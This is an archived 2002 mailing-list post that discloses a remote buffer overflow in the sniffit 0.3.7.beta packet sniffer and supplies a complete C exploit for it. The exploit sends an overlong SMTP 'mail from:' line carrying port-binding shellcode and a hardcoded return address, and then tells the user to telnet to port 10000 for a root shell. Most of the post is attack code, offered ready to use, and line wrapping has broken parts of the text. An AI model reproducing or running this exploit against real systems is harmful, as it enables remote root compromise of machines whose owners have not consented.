remote buffer overflow in sniffit

From: g_463at_private
Date: Sat Jan 19 2002 - 10:57:03 PST

  • Next message: zen-parse: "Re: uucp --config patch -- not sufficient"

     ('binary' encoding is not supported, stored as-is)
       Remote overflow in sniffit.0.3.7.beta 
       tested on slackware 7.1
       found/coded by g463
       -18th january 2002-
       The vulnerability is triggered when the option -L is 
    called from the 
       command line with 'normmail'
       ie : ./sniffit -c ./sample_config_file -L normmail
       It calls a piece of code where the buffer is 
           //From sniffit.0.3.7.beta/sn_logfile.c
           void print_mail (char *conn, char *msg)
           char line[250];
           sprintf(line,"%s: mail [%s]",conn,msg);
           print_logline (line);
           -  In a normal situation, it could be easier to fill line
    [250] with our 
           shellcode,  but  since  this buffer  gets filter  with 
    some kind of 
           strlower() function  (thus our shellcode/return 
    adress too), i rely 
           on an unfiltered buffer with the same data so we 
    can point eip back 
           at that place with clean, unmodified shellcode :D
    All my brothers (alphabetical order) : Erebus, Jinx, 
    mtadbf, nitr0gen, Slink[e]
    + some others i forget :p
    #include <stdio.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <unistd.h>
    #include <error.h>
    #include <string.h>
    #define SMTP_PORT 25
    #define MAX_LINE 256
    #define BUFLEN 252
    //define this to your ip
    #define MY_IP ""
    //Value for overwriting eip
    //should be the adress of the data buffer + some 
    couple of garbage bytes
    #define RETADR 0x08059408
    //Port binding shellcode, binds on port 10000
    //taken from bighawkat_private
    char shellcode[] =
       "\x31\xc0"			// xor     eax, 
       "\x31\xdb"			// xor     ebx, 
       "\x89\xe5"			// mov     ebp, 
       "\x99"			// cdq
       "\xb0\x66"			// mov     al, 
       "\x89\x5d\xfc"		// mov     [ebp-4], ebx
       "\x43"			// inc     ebx
       "\x89\x5d\xf8"		// mov     [ebp-8], ebx
       "\x43"			// inc     ebx
       "\x89\x5d\xf4"		// mov     [ebp-12], ebx
       "\x4b"			// dec     ebx
       "\x8d\x4d\xf4"		// lea     ecx, [ebp-12]
       "\xcd\x80"			// int     80h
       "\x89\x45\xf4"		// mov     [ebp-12], eax
       "\x43"			// inc     ebx
       "\x66\x89\x5d\xec"		// mov     [ebp-
    20], bx
       "\x66\xc7\x45\xee\x27\x10"	// mov     [ebp-18], word 
       "\x89\x55\xf0"		// mov     [ebp-16], edx
       "\x8d\x45\xec"		// lea     eax, [ebp-20]
       "\x89\x45\xf8"		// mov     [ebp-8], eax
       "\xc6\x45\xfc\x10"		// mov     [ebp-4], byte 
       "\xb2\x66"			// mov     dl, 
       "\x89\xd0"			// mov     eax, 
       "\x8d\x4d\xf4"		// lea     ecx, [ebp-12]
       "\xcd\x80"			// int     80h
       "\x89\xd0"			// mov     eax, 
       "\xb3\x04"			// mov     bl, 4
       "\xcd\x80"			// int     80h
       "\x43"			// inc     ebx
       "\x89\xd0"			// mov     eax, 
       "\x99"			// cdq
       "\x89\x55\xf8"		// mov     [ebp-8], edx
       "\x89\x55\xfc"		// mov     [ebp-4], edx
       "\xcd\x80"			// int     80h
       "\x31\xc9"			// xor     ecx, 
       "\x89\xc3"			// mov     ebx, 
       "\xb1\x03"			// mov     cl, 3
       "\xb0\x3f"			// mov     al, 
       "\x49"			// dec     ecx
       "\xcd\x80"			// int     80h
       "\x41"			// inc     ecx
       "\xe2\xf8"			// loop    -7
       "\x52"			// push    edx
       "\x68\x6e\x2f\x73\x68"	// push    dword 
       "\x68\x2f\x2f\x62\x69"	// push    dword 
       "\x89\xe3"			// mov     ebx, 
       "\x52"			// push    edx
       "\x53"			// push    ebx
       "\x89\xe1"			// mov     ecx, 
       "\xb0\x0b"			// mov     al, 
       "\xcd\x80";			// int     80h
    int usage (char *);
    int calculate_conn_lenght (struct sockaddr_in, struct 
    main (int argc, char *argv[])
       struct sockaddr_in stServer, stClient;
       char *ptHost;   
       unsigned long int iHost;   
       int iSockfd, iLenght, iAlign = 0;
       char sBuffer[MAX_LINE];
       char sString[300];
       int i;
       if (argc != 2) usage (argv[0]);
       ptHost = argv[1];
       if ( (iHost = inet_addr (argv[1])) == INADDR_NONE) 
          printf ("Invalid host or host is\n");
          exit (-1);
       //Fill the server struct
       memset (&stServer, 0, sizeof (struct sockaddr_in));
       stServer.sin_family      = AF_INET;
       stServer.sin_port        = htons (SMTP_PORT);
       stServer.sin_addr.s_addr = iHost;
       if ( (iSockfd = socket (AF_INET, SOCK_STREAM, 
    0)) == -1) {
          printf ("Error opening socket\n");
          exit (-1);
       // Fill the client struct, mainly used to calculate the 
    right align for RET addy
       memset (&stClient, 0, sizeof (struct sockaddr_in));
       stClient.sin_family      = AF_INET;
       stClient.sin_port        = htons (0);
       stClient.sin_addr.s_addr = inet_addr (MY_IP);
       if ( (bind (iSockfd, (struct sockaddr *) &stClient, 
    sizeof (stClient))) == -1 ) {
          perror ("Cant bind socket");
          exit (-1);
       iAlign = calculate_conn_lenght (stClient, stServer);
       i = BUFLEN - iAlign + 4;
       if ( (connect (iSockfd, (struct sockaddr *) 
    &stServer, sizeof (stServer))) != 0) {
          perror ("Cant connect");
          exit (-1);
       else printf ("Connected to host %s on port %d\n\n", 
    ptHost, SMTP_PORT);
       // Recevons la banniŠre du serveur smtp
       if ( (iLenght = recv (iSockfd, sBuffer, MAX_LINE, 0)) 
    == -1) {
          perror ("Cant get server banner");
          exit (-1); 
       printf ("%s\n", sBuffer); 
       printf ("Building evil string... >:)\n");
       memset (sString, 0x90, sizeof (sString));    
       memcpy (sString, "mail from:", strlen ("mail from:"));
       memcpy(sString + i - strlen (shellcode), shellcode, 
    strlen (shellcode));
       sString[i++] = (RETADR & 0x000000ff);
       sString[i++] = (RETADR & 0x0000ff00) >> 8;
       sString[i++] = (RETADR & 0x00ff0000) >> 16;
       sString[i++] = (RETADR & 0xff000000) >> 24;
       sString[i]   = '\0';    
       if ( (send (iSockfd, sString, strlen (sString), 0)) == -
    1) {
          perror ("cant send message");
          exit (-1);
       printf ("Evil string sent!\n");
       printf ("Try telneting the host on port 10000 for r00t 
       close (iSockfd);
       return (0);
    int usage (char *progname) 
       printf ("%s <ip>\n", progname);   
       exit (-1);
       function to calculate conn entry lenght
       ie : strlen of ("");
       (fuckin dirty but heh it works)
    int calculate_conn_lenght (struct sockaddr_in me, 
    struct sockaddr_in him)
       int lenght = 0;
       struct in_addr in;
       in.s_addr = me.sin_addr.s_addr;
       lenght += strlen (inet_ntoa (in));     //
       lenght++;                              // .
       lenght += 4;                           // 1220
       lenght ++;                             // .
       in.s_addr = him.sin_addr.s_addr;
       lenght += strlen (inet_ntoa (in));     //
       lenght++;                              // .
       lenght += 2;                           // 25
       lenght += strlen (": mail [");         
       return (lenght);

    This archive was generated by hypermail 2b30 : Mon Jan 21 2002 - 21:16:14 PST